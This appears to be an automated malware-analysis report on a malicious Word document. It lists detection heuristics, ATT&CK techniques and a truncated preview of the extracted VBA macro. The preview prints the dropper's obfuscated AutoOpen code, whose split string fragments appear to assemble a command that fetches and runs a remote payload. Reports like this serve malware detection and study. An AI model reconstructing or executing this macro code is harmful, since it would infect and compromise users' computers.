MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a common technique for executing arbitrary commands. The macro's obfuscated nature and the presence of the Shell() call strongly suggest it's designed to download and execute a secondary payload, aligning with dropper malware behavior. The ClamAV detection further supports its malicious classification.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6447493-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6447493-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27928 bytes |
SHA-256: e94015899c119c389291fb84354016b4e981560da34538f413c151b9bece66d0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "zCXjiKlX" Sub AutoOpen() On Error Resume Next DbJShHFwQ = TaIEonJ - Sgn(BFmhpI) - (4733504 - Tan(5556505) / 2810340 - ChrW(BCAAjqJPG)) iqcpWRmbR = XfH - Sgn(mArNWlAuEs) - (6082448 - Tan(9135478) / 2799740 - ChrW(TrRuZhf)) YYQPPChGb = utUOzsdmdFjl - Sgn(JaDTHajcFaC) - (2728690 - Tan(5314530) / 5217272 - ChrW(GjTndBkBuFUwoI)) Application.Run "GJdWYqoY", ZmpfWJiQrQwXSz vbvmpGoMj = frOoTRAX - Sgn(jfumwI) - (6563404 - Tan(4775318) / 4857342 - ChrW(NncvU)) KwGbmUIuz = HlmvhcFwhIcAo - Sgn(iHhPDWmDwuiULY) - (7217208 - Tan(9408882) / 4542484 - ChrW(vtoXvdrjIqu)) nrJKGzfms = dGDprRNRjLkk - Sgn(FvLGLEYXNwJI) - (578662 - Tan(4082231) / 2097654 - ChrW(bGKi)) End Sub Function ZmpfWJiQrQwXSz() On Error Resume Next UClwCvDz = ZsmUMj - Sgn(qUJidKI) - (4721237 - Tan(2065442) / 7142801 - ChrW(qnROACWiiUAItB)) ibAVb = mzldLwCs - Sgn(wrHCI) - (3046709 - Tan(3445754) / 1931161 - ChrW(fzuzKsjziAAp)) KmBCP = PdGYL - Sgn(hZzovHRJvUW) - (3604471 - Tan(465863) / 8106818 - ChrW(NEcomtu)) PYuLGUDU = BWiPjJl + Mid(zRAlf + "SsBZYYwwLPPbB+Pb'+'Be/oDV'+'rtfgb+fgbs3+ts3Tufgb'+'+fgb2/ts3+ts3Eo1.Splfgb+fgbts3fgb+fgb+ts3itts3+ts3(Ets3+ts3ots3+ts31ts3+ts'+'3?ts3+ts3Eots3+fgb+fgbtsjzSRnhc" + YqUacoh, 11, 142) DSjwKw = dMhzzuCZdjYt - Sgn(LlnDnhhRYmNX) - (2598395 - Tan(512586) / 6377762 - ChrW(dztKGkBTuUqYF)) aKEjza = zjlpEvV - Sgn(BLAWEZTamrVdz) - (7098924 - Tan(6058974) / 6636748 - ChrW(bjTJTrJMGn)) VSXuIRH = lYwlaizhJk - Sgn(czThwDbSOA) - (613631 - Tan(1766568) / 5513532 - ChrW(CmhUr)) ijoiNVRi = OBrTkbivj + Mid(fcPj + "PjfahVPiAHzQnGa+PbBfgb+fgb (Ets3+ts3oPb'+'B+PbBt'+'s3'+'+ts31.ts3+ts3exEo1+fgb+f'+'gb'+'ts3+ts3Eo1ts3+ts3ets3fgb+fgb+'+'ts3Eo1);fots3+ts3reacts3+ts3h(ofgbzBDWj" + zpti, 16, 139) FNEfh = PNSbhqOfTFUYAa - Sgn(iNj) - (1046260 - Tan(6671584) / 9405590 - ChrW(bmZJNEGzXJfVXk)) EvrGbu = UOQF - Sgn(SnlLn) - (9614443 - Tan(5925860) / 748728 - ChrW(oUp)) cSQSSoY = TmfBXcJZUiKtiC - Sgn(YtSodmd) - (7674238 - Tan(233212) / 2595619 - ChrW(PZCwippX)) dhMUqzJw = wmloOsjD + Mid(nzYvvGT + "ZkkdziICiVLts3PbB+PbB+ts3fgb+fgbyts3fgb+fgb+t'+'s3/?http:'+'ts3+ts3//wwt'+'s'+'3+ts3wts3+ts3.bats3+fgb+fgbtfgb+fgbs3by-glf'+'gb+fgbamouts3+ts3rts3+ts3.dt'+'s3+PbB+P'+'bBts'+'3GFhTmncLziwzBOIELYwTDKaO" + lsFkoYhiOVZY, 10, 166) DKsNU = TzacAhBfjavNUM - Sgn(qLJdKOzw) - (5872203 - Tan(7792085) / 5159405 - ChrW(ObEFO)) wqJbiMh = wsi - Sgn(tiiLJPDsos) - (4402076 - Tan(52036) / 6129057 - ChrW(LawkUAvnZVmE)) XKPsRz = UhMXUoIRfw - Sgn(EkslAhpOvPunEM) - (4776016 - Tan(6426041) / 7225535 - ChrW(FIYF)) YCrJOsr = waSqovl + Mid(EaSIvMfHWfMMpw + "vO]'+'-joiNts3ts3)(((ts3oPbB+PbBH8nts3+tsPbB+PbB3sadaPbB+PbBsdfgb+fg'+'b = &(Eo1nEts3+ts3o1+fgb+fgbEots3+ts31PbB+P'+'b'+'Be'+'Ets3+tfgbHZtkfJMPimcqhE" + oBNjWWAVEH, 3, 133) JOlDEdVSYs = bzAJZXMmCYsO - Sgn(HjpYb) - (3531821 - Tan(2527339) / 5477664 - ChrW(wUI)) WwJrX = UJHFzLG - Sgn(VjizkPfuWjX) - (2283069 - Tan(6479455) / 117977 - ChrW(FhvtMNbCjA)) MSCbJhZI = DDiw - Sgn(hIZlAGZq) - (479443 - Tan(6539114) / 6584759 - ChrW(MzwkTfBXD)) HntjzBp = jLcVCMXWjbzf + Mid(IKnrjYIPatH + "lvzDQoYcGPCcQcMbmzcLCXvLWoLAG]34 -cREplaCets3ocnts3,[chaPbB+fgb+fgbPbBR]9PbB+PbB2 -RepPbB+PbBLacfgb+fgbe fgb+fgb([chaR]111+[c'+'haR]72+[ch'+'aR]56),[chaR]36 -RepLace ts39WKts3fgb+fgb,[chaR]96 -fgb+jT" + vGXLZ, 30, 170) FGQqcrBi = WjX - Sgn(YUPOBrWEa) - (2581532 - Tan(8101972) / 1128494 - ChrW(EBGtcEB)) wSplGcjiOa = Pwb - Sgn(twpTvG) - (5501343 - Tan(871072) / 7436723 - ChrW(qao)) IFiGcwjiP = XHuh - Sgn(AYMtncKtfWaJW) - (7681512 - Tan(89896) / 1574495 - ChrW(hliGNBjDLjEWh)) qrTZaFTltJr = tYuiCwdMc + Mid(ZLqDHP + "DJmAHnhfLEPLAce(([chaR]99+[chaR]1pOKXXIvZjD " + wIFqifzpj, 10, 24) dwsjjzHMCfA = futuPSTMrtQYE - Sgn(wiVnRAM) - (5030230 - Tan(9004359) / 6194703 - ChrW(zGuODZdWluPJ)) IhTpvodKWj = XENdjDowtISw - Sgn(ataiFzNEQMYzo) - (3733784 - ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.